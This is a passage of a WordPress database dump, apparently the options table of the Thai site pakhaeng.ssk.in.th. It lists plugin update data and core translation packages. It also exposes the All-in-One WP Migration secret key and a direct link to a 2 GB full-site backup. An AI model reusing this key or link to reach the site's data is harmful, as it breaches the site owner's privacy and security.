4:\"slug\";s:14:\"kadence-blocks\";s:6:\"plugin\";s:33:\"kadence-blocks/kadence-blocks.php\";s:11:\"new_version\";s:6:\"3.5.21\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/kadence-blocks/\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/plugin/kadence-blocks.3.5.21.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/kadence-blocks/assets/icon-256x256.png?rev=3178382\";s:2:\"1x\";s:67:\"https://ps.w.org/kadence-blocks/assets/icon-128x128.png?rev=3178382\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/kadence-blocks/assets/banner-1544x500.jpg?rev=3178382\";s:2:\"1x\";s:69:\"https://ps.w.org/kadence-blocks/assets/banner-772x250.jpg?rev=3178382\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.6\";}s:49:\"gallery-block-lightbox/gallery-block-lightbox.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:36:\"w.org/plugins/gallery-block-lightbox\";s:4:\"slug\";s:22:\"gallery-block-lightbox\";s:6:\"plugin\";s:49:\"gallery-block-lightbox/gallery-block-lightbox.php\";s:11:\"new_version\";s:4:\"1.16\";s:3:\"url\";s:53:\"https://wordpress.org/plugins/gallery-block-lightbox/\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/plugin/gallery-block-lightbox.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:67:\"https://ps.w.org/gallery-block-lightbox/assets/icon.svg?rev=2788519\";s:3:\"svg\";s:67:\"https://ps.w.org/gallery-block-lightbox/assets/icon.svg?rev=2788519\";}s:7:\"banners\";a:0:{}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.4\";}s:47:\"one-click-demo-import/one-click-demo-import.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:35:\"w.org/plugins/one-click-demo-import\";s:4:\"slug\";s:21:\"one-click-demo-import\";s:6:\"plugin\";s:47:\"one-click-demo-import/one-click-demo-import.php\";s:11:\"new_version\";s:5:\"3.4.0\";s:3:\"url\";s:52:\"https://wordpress.org/plugins/one-click-demo-import/\";s:7:\"package\";s:70:\"https://downloads.wordpress.org/plugin/one-click-demo-import.3.4.0.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:74:\"https://ps.w.org/one-click-demo-import/assets/icon-256x256.png?rev=2506685\";s:2:\"1x\";s:74:\"https://ps.w.org/one-click-demo-import/assets/icon-128x128.png?rev=2506685\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:77:\"https://ps.w.org/one-click-demo-import/assets/banner-1544x500.png?rev=2506685\";s:2:\"1x\";s:76:\"https://ps.w.org/one-click-demo-import/assets/banner-772x250.png?rev=2506685\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.5\";}s:37:\"optinmonster/optin-monster-wp-api.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:26:\"w.org/plugins/optinmonster\";s:4:\"slug\";s:12:\"optinmonster\";s:6:\"plugin\";s:37:\"optinmonster/optin-monster-wp-api.php\";s:11:\"new_version\";s:7:\"2.16.20\";s:3:\"url\";s:43:\"https://wordpress.org/plugins/optinmonster/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/optinmonster.2.16.20.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/optinmonster/assets/icon-256x256.png?rev=1145864\";s:2:\"1x\";s:65:\"https://ps.w.org/optinmonster/assets/icon-128x128.png?rev=1145864\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:68:\"https://ps.w.org/optinmonster/assets/banner-1544x500.png?rev=2311621\";s:2:\"1x\";s:67:\"https://ps.w.org/optinmonster/assets/banner-772x250.png?rev=2311621\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.7\";}s:31:\"popup-builder/popup-builder.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:27:\"w.org/plugins/popup-builder\";s:4:\"slug\";s:13:\"popup-builder\";s:6:\"plugin\";s:31:\"popup-builder/popup-builder.php\";s:11:\"new_version\";s:5:\"4.4.0\";s:3:\"url\";s:44:\"https://wordpress.org/plugins/popup-builder/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/plugin/popup-builder.4.4.0.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:66:\"https://ps.w.org/popup-builder/assets/icon-128x128.gif?rev=2698840\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:68:\"https://ps.w.org/popup-builder/assets/banner-772x250.jpg?rev=2698842\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.2\";}s:41:\"post-views-counter/post-views-counter.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:32:\"w.org/plugins/post-views-counter\";s:4:\"slug\";s:18:\"post-views-counter\";s:6:\"plugin\";s:41:\"post-views-counter/post-views-counter.php\";s:11:\"new_version\";s:5:\"1.5.5\";s:3:\"url\";s:49:\"https://wordpress.org/plugins/post-views-counter/\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/plugin/post-views-counter.1.5.5.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:71:\"https://ps.w.org/post-views-counter/assets/icon-256x256.png?rev=2973820\";s:2:\"1x\";s:71:\"https://ps.w.org/post-views-counter/assets/icon-128x128.png?rev=2973820\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:73:\"https://ps.w.org/post-views-counter/assets/banner-772x250.png?rev=2973820\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:5:\"6.3.0\";}s:35:\"question-answer/question-answer.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:29:\"w.org/plugins/question-answer\";s:4:\"slug\";s:15:\"question-answer\";s:6:\"plugin\";s:35:\"question-answer/question-answer.php\";s:11:\"new_version\";s:6:\"1.2.70\";s:3:\"url\";s:46:\"https://wordpress.org/plugins/question-answer/\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/plugin/question-answer.1.2.70.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:68:\"https://ps.w.org/question-answer/assets/icon-128x128.png?rev=3126673\";}s:7:\"banners\";a:0:{}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.1\";}s:41:\"seed-buddhist-year/seed-buddhist-year.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:32:\"w.org/plugins/seed-buddhist-year\";s:4:\"slug\";s:18:\"seed-buddhist-year\";s:6:\"plugin\";s:41:\"seed-buddhist-year/seed-buddhist-year.php\";s:11:\"new_version\";s:5:\"1.0.4\";s:3:\"url\";s:49:\"https://wordpress.org/plugins/seed-buddhist-year/\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/plugin/seed-buddhist-year.1.0.4.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:71:\"https://ps.w.org/seed-buddhist-year/assets/icon-256x256.png?rev=1412103\";s:2:\"1x\";s:71:\"https://ps.w.org/seed-buddhist-year/assets/icon-128x128.png?rev=1412103\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:74:\"https://ps.w.org/seed-buddhist-year/assets/banner-1544x500.png?rev=1412103\";s:2:\"1x\";s:73:\"https://ps.w.org/seed-buddhist-year/assets/banner-772x250.png?rev=1412103\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:5:\"4.0.1\";}s:25:\"seed-fonts/seed-fonts.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:24:\"w.org/plugins/seed-fonts\";s:4:\"slug\";s:10:\"seed-fonts\";s:6:\"plugin\";s:25:\"seed-fonts/seed-fonts.php\";s:11:\"new_version\";s:5:\"2.4.2\";s:3:\"url\";s:41:\"https://wordpress.org/plugins/seed-fonts/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/plugin/seed-fonts.2.4.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/seed-fonts/assets/icon-256x256.png?rev=1670226\";s:2:\"1x\";s:63:\"https://ps.w.org/seed-fonts/assets/icon-128x128.png?rev=1670224\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/seed-fonts/assets/banner-1544x500.png?rev=1934593\";s:2:\"1x\";s:65:\"https://ps.w.org/seed-fonts/assets/banner-772x250.png?rev=1934592\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.0\";}s:27:\"seed-social/seed-social.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:25:\"w.org/plugins/seed-social\";s:4:\"slug\";s:11:\"seed-social\";s:6:\"plugin\";s:27:\"seed-social/seed-social.php\";s:11:\"new_version\";s:5:\"2.0.6\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/seed-social/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/seed-social.2.0.6.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/seed-social/assets/icon-256x256.jpg?rev=3086884\";s:2:\"1x\";s:64:\"https://ps.w.org/seed-social/assets/icon-128x128.jpg?rev=3086883\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/seed-social/assets/banner-1544x500.jpg?rev=3086923\";s:2:\"1x\";s:66:\"https://ps.w.org/seed-social/assets/banner-772x250.jpg?rev=3086923\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.5\";}s:20:\"team-members/tmm.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:26:\"w.org/plugins/team-members\";s:4:\"slug\";s:12:\"team-members\";s:6:\"plugin\";s:20:\"team-members/tmm.php\";s:11:\"new_version\";s:5:\"5.3.6\";s:3:\"url\";s:43:\"https://wordpress.org/plugins/team-members/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/team-members.5.3.6.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/team-members/assets/icon-256x256.png?rev=1849322\";s:2:\"1x\";s:65:\"https://ps.w.org/team-members/assets/icon-128x128.png?rev=1849322\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:67:\"https://ps.w.org/team-members/assets/banner-772x250.png?rev=1849322\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.6\";}s:24:\"wpforms-lite/wpforms.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:26:\"w.org/plugins/wpforms-lite\";s:4:\"slug\";s:12:\"wpforms-lite\";s:6:\"plugin\";s:24:\"wpforms-lite/wpforms.php\";s:11:\"new_version\";s:7:\"1.9.7.3\";s:3:\"url\";s:43:\"https://wordpress.org/plugins/wpforms-lite/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/wpforms-lite.1.9.7.3.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:57:\"https://ps.w.org/wpforms-lite/assets/icon.svg?rev=3254748\";s:3:\"svg\";s:57:\"https://ps.w.org/wpforms-lite/assets/icon.svg?rev=3254748\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:68:\"https://ps.w.org/wpforms-lite/assets/banner-1544x500.png?rev=3091364\";s:2:\"1x\";s:67:\"https://ps.w.org/wpforms-lite/assets/banner-772x250.png?rev=3091364\";}s:11:\"banners_rtl\";a:2:{s:2:\"2x\";s:72:\"https://ps.w.org/wpforms-lite/assets/banner-1544x500-rtl.png?rev=3254748\";s:2:\"1x\";s:71:\"https://ps.w.org/wpforms-lite/assets/banner-772x250-rtl.png?rev=3254748\";}s:8:\"requires\";s:3:\"5.5\";}}s:7:\"checked\";a:20:{s:19:\"akismet/akismet.php\";s:3:\"5.5\";s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";s:4:\"7.99\";s:59:\"content-views-query-and-display-post-page/content-views.php\";s:3:\"4.2\";s:23:\"elementor/elementor.php\";s:6:\"3.32.2\";s:25:\"embedpress/embedpress.php\";s:5:\"4.4.1\";s:25:\"forminator/forminator.php\";s:6:\"1.47.0\";s:25:\"generateblocks/plugin.php\";s:5:\"2.1.1\";s:33:\"kadence-blocks/kadence-blocks.php\";s:6:\"3.5.21\";s:49:\"gallery-block-lightbox/gallery-block-lightbox.php\";s:4:\"1.16\";s:47:\"one-click-demo-import/one-click-demo-import.php\";s:5:\"3.4.0\";s:37:\"optinmonster/optin-monster-wp-api.php\";s:7:\"2.16.20\";s:31:\"popup-builder/popup-builder.php\";s:5:\"4.4.0\";s:41:\"post-views-counter/post-views-counter.php\";s:5:\"1.5.5\";s:35:\"question-answer/question-answer.php\";s:6:\"1.2.70\";s:41:\"seed-buddhist-year/seed-buddhist-year.php\";s:5:\"1.0.4\";s:25:\"seed-fonts/seed-fonts.php\";s:5:\"2.4.2\";s:27:\"seed-social/seed-social.php\";s:5:\"2.0.6\";s:55:\"nextend-smart-slider3-pro/nextend-smart-slider3-pro.php\";s:8:\"3.5.1.19\";s:20:\"team-members/tmm.php\";s:5:\"5.3.6\";s:24:\"wpforms-lite/wpforms.php\";s:7:\"1.9.7.3\";}}','off'),
(98939,'_site_transient_update_themes','O:8:\"stdClass\":1:{s:12:\"last_checked\";i:1758691845;}','off'),
(98940,'ai1wm_secret_key','pO6juh1jD3iQ','auto'),
(98949,'ai1wm_status','a:2:{s:4:\"type\";s:8:\"download\";s:7:\"message\";s:388:\"<a href=\"http://pakhaeng.ssk.in.th/wp-content/ai1wm-backups/pakhaeng-ssk-in-th-20250924-124142-flon7lcr66c6.wpress\" class=\"ai1wm-button-green ai1wm-emphasize ai1wm-button-download\" title=\"pakhaeng.ssk.in.th\" download=\"pakhaeng-ssk-in-th-20250924-124142-flon7lcr66c6.wpress\">\n							<span>ดาวน์โหลด pakhaeng.ssk.in.th</span>\n							<em>ขนาด: 2 GB</em>\n							</a>\";}','auto'),
(98959,'_site_transient_timeout_available_translations','1758706552','off'),
(98960,'_site_transient_available_translations','a:131:{s:2:\"af\";a:8:{s:8:\"language\";s:2:\"af\";s:7:\"version\";s:8:\"5.8-beta\";s:7:\"updated\";s:19:\"2021-05-13 15:59:22\";s:12:\"english_name\";s:9:\"Afrikaans\";s:11:\"native_name\";s:9:\"Afrikaans\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/5.8-beta/af.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"af\";i:2;s:3:\"afr\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"Gaan voort\";}}s:2:\"am\";a:8:{s:8:\"language\";s:2:\"am\";s:7:\"version\";s:6:\"6.0.10\";s:7:\"updated\";s:19:\"2022-09-29 20:43:49\";s:12:\"english_name\";s:7:\"Amharic\";s:11:\"native_name\";s:12:\"አማርኛ\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.0.10/am.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"am\";i:2;s:3:\"amh\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"ቀጥል\";}}s:3:\"arg\";a:8:{s:8:\"language\";s:3:\"arg\";s:7:\"version\";s:8:\"6.2-beta\";s:7:\"updated\";s:19:\"2022-09-22 16:46:56\";s:12:\"english_name\";s:9:\"Aragonese\";s:11:\"native_name\";s:9:\"Aragonés\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/6.2-beta/arg.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"an\";i:2;s:3:\"arg\";i:3;s:3:\"arg\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continar\";}}s:2:\"ar\";a:8:{s:8:\"language\";s:2:\"ar\";s:7:\"version\";s:5:\"6.4.6\";s:7:\"updated\";s:19:\"2024-02-13 12:49:38\";s:12:\"english_name\";s:6:\"Arabic\";s:11:\"native_name\";s:14:\"العربية\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.4.6/ar.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ar\";i:2;s:3:\"ara\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"متابعة\";}}s:3:\"ary\";a:8:{s:8:\"language\";s:3:\"ary\";s:7:\"version\";s:6:\"4.8.26\";s:7:\"updated\";s:19:\"2017-01-26 15:42:35\";s:12:\"english_name\";s:15:\"Moroccan Arabic\";s:11:\"native_name\";s:31:\"العربية المغربية\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/translation/core/4.8.26/ary.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ar\";i:3;s:3:\"ary\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:16:\"المتابعة\";}}s:2:\"as\";a:8:{s:8:\"language\";s:2:\"as\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-07-10 08:09:09\";s:12:\"english_name\";s:8:\"Assamese\";s:11:\"native_name\";s:21:\"অসমীয়া\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.8.2/as.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"as\";i:2;s:3:\"asm\";i:3;s:3:\"asm\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:3:\"azb\";a:8:{s:8:\"language\";s:3:\"azb\";s:7:\"version\";s:5:\"6.4.6\";s:7:\"updated\";s:19:\"2024-01-19 08:58:31\";s:12:\"english_name\";s:17:\"South Azerbaijani\";s:11:\"native_name\";s:29:\"گؤنئی آذربایجان\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.4.6/azb.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"az\";i:3;s:3:\"azb\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:2:\"az\";a:8:{s:8:\"language\";s:2:\"az\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-11-06 00:09:27\";s:12:\"english_name\";s:11:\"Azerbaijani\";s:11:\"native_name\";s:16:\"Azərbaycan dili\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/az.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"az\";i:2;s:3:\"aze\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:5:\"Davam\";}}s:3:\"bel\";a:8:{s:8:\"language\";s:3:\"bel\";s:7:\"version\";s:6:\"4.9.27\";s:7:\"updated\";s:19:\"2024-12-26 00:37:42\";s:12:\"english_name\";s:10:\"Belarusian\";s:11:\"native_name\";s:29:\"Беларуская мова\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/translation/core/4.9.27/bel.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"be\";i:2;s:3:\"bel\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:20:\"Працягнуць\";}}s:5:\"bg_BG\";a:8:{s:8:\"language\";s:5:\"bg_BG\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-06-26 09:35:39\";s:12:\"english_name\";s:9:\"Bulgarian\";s:11:\"native_name\";s:18:\"Български\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/bg_BG.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"bg\";i:2;s:3:\"bul\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"Напред\";}}s:5:\"bn_BD\";a:8:{s:8:\"language\";s:5:\"bn_BD\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-07-01 14:03:28\";s:12:\"english_name\";s:20:\"Bengali (Bangladesh)\";s:11:\"native_name\";s:15:\"বাংলা\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/bn_BD.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"bn\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:28:\"চালিয়ে যান\";}}s:2:\"bo\";a:8:{s:8:\"language\";s:2:\"bo\";s:7:\"version\";s:8:\"5.8-beta\";s:7:\"updated\";s:19:\"2020-10-30 03:24:38\";s:12:\"english_name\";s:7:\"Tibetan\";s:11:\"native_name\";s:21:\"བོད་ཡིག\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/5.8-beta/bo.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"bo\";i:2;s:3:\"tib\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:33:\"མུ་མཐུད་དུ།\";}}s:5:\"bs_BA\";a:8:{s:8:\"language\";s:5:\"bs_BA\";s:7:\"version\";s:5:\"6.2.7\";s:7:\"updated\";s:19:\"2023-02-22 20:45:53\";s:12:\"english_name\";s:7:\"Bosnian\";s:11:\"native_name\";s:8:\"Bosanski\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.2.7/bs_BA.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"bs\";i:2;s:3:\"bos\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:7:\"Nastavi\";}}s:2:\"ca\";a:8:{s:8:\"language\";s:2:\"ca\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-09-19 10:33:50\";s:12:\"english_name\";s:7:\"Catalan\";s:11:\"native_name\";s:7:\"Català\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.8.2/ca.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ca\";i:2;s:3:\"cat\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continua\";}}s:3:\"ceb\";a:8:{s:8:\"language\";s:3:\"ceb\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-03-02 17:25:51\";s:12:\"english_name\";s:7:\"Cebuano\";s:11:\"native_name\";s:7:\"Cebuano\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/ceb.zip\";s:3:\"iso\";a:2:{i:2;s:3:\"ceb\";i:3;s:3:\"ceb\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:7:\"Padayun\";}}s:5:\"cs_CZ\";a:8:{s:8:\"language\";s:5:\"cs_CZ\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-09-09 08:25:54\";s:12:\"english_name\";s:5:\"Czech\";s:11:\"native_name\";s:9:\"Čeština\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/cs_CZ.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"cs\";i:2;s:3:\"ces\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:11:\"Pokračovat\";}}s:2:\"cy\";a:8:{s:8:\"language\";s:2:\"cy\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-07-11 16:48:51\";s:12:\"english_name\";s:5:\"Welsh\";s:11:\"native_name\";s:7:\"Cymraeg\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.8.2/cy.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"cy\";i:2;s:3:\"cym\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Parhau\";}}s:5:\"da_DK\";a:8:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-09-18 18:49:28\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/da_DK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"da\";i:2;s:3:\"dan\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Fortsæt\";}}s:5:\"de_AT\";a:8:{s:8:\"language\";s:5:\"de_AT\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-06-05 10:10:20\";s:12:\"english_name\";s:16:\"German (Austria)\";s:11:\"native_name\";s:21:\"Deutsch (Österreich)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/de_AT.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Weiter\";}}s:5:\"de_DE\";a:8:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-09-23 13:57:56\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/de_DE.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Weiter\";}}s:12:\"de_DE_formal\";a:8:{s:8:\"language\";s:12:\"de_DE_formal\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-09-23 13:57:12\";s:12:\"english_name\";s:15:\"German (Formal)\";s:11:\"native_name\";s:13:\"Deutsch (Sie)\";s:7:\"package\";s:71:\"https://downloads.wordpress.org/translation/core/6.8.2/de_DE_formal.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Weiter\";}}s:5:\"de_CH\";a:8:{s:8:\"language\";s:5:\"de_CH\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-07-28 10:25:03\";s:12:\"english_name\";s:20:\"German (Switzerland)\";s:11:\"native_name\";s:17:\"Deutsch (Schweiz)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/de_CH.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Weiter\";}}s:14:\"de_CH_informal\";a:8:{s:8:\"language\";s:14:\"de_CH_informal\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-07-28 10:25:24\";s:12:\"english_name\";s:30:\"German (Switzerland, Informal)\";s:11:\"native_name\";s:21:\"Deutsch (Schweiz, Du)\";s:7:\"package\";s:73:\"https://downloads.wordpress.org/translation/core/6.8.2/de_CH_informal.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Weiter\";}}s:3:\"dsb\";a:8:{s:8:\"language\";s:3:\"dsb\";s:7:\"version\";s:5:\"6.2.7\";s:7:\"updated\";s:19:\"2022-07-16 12:13:09\";s:12:\"english_name\";s:13:\"Lower Sorbian\";s:11:\"native_name\";s:16:\"Dolnoserbšćina\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.2.7/dsb.zip\";s:3:\"iso\";a:2:{i:2;s:3:\"dsb\";i:3;s:3:\"dsb\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:5:\"Dalej\";}}s:3:\"dzo\";a:8:{s:8:\"language\";s:3:\"dzo\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-06-29 08:59:03\";s:12:\"english_name\";s:8:\"Dzongkha\";s:11:\"native_name\";s:18:\"རྫོང་ཁ\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/dzo.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"dz\";i:2;s:3:\"dzo\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:2:\"el\";a:8:{s:8:\"language\";s:2:\"el\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-07-21 14:54:13\";s:12:\"english_name\";s:5:\"Greek\";s:11:\"native_name\";s:16:\"Ελληνικά\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.8.2/el.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"el\";i:2;s:3:\"ell\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:16:\"Συνέχεια\";}}s:5:\"en_NZ\";a:8:{s:8:\"language\";s:5:\"en_NZ\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-05-22 11:56:25\";s:12:\"english_name\";s:21:\"English (New Zealand)\";s:11:\"native_name\";s:21:\"English (New Zealand)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/en_NZ.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"en_CA\";a:8:{s:8:\"language\";s:5:\"en_CA\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-07-30 21:52:12\";s:12:\"english_name\";s:16:\"English (Canada)\";s:11:\"native_name\";s:16:\"English (Canada)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/en_CA.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"en_AU\";a:8:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-08-19 23:02:24\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/en_AU.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"en_GB\";a:8:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-08-25 13:50:40\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English 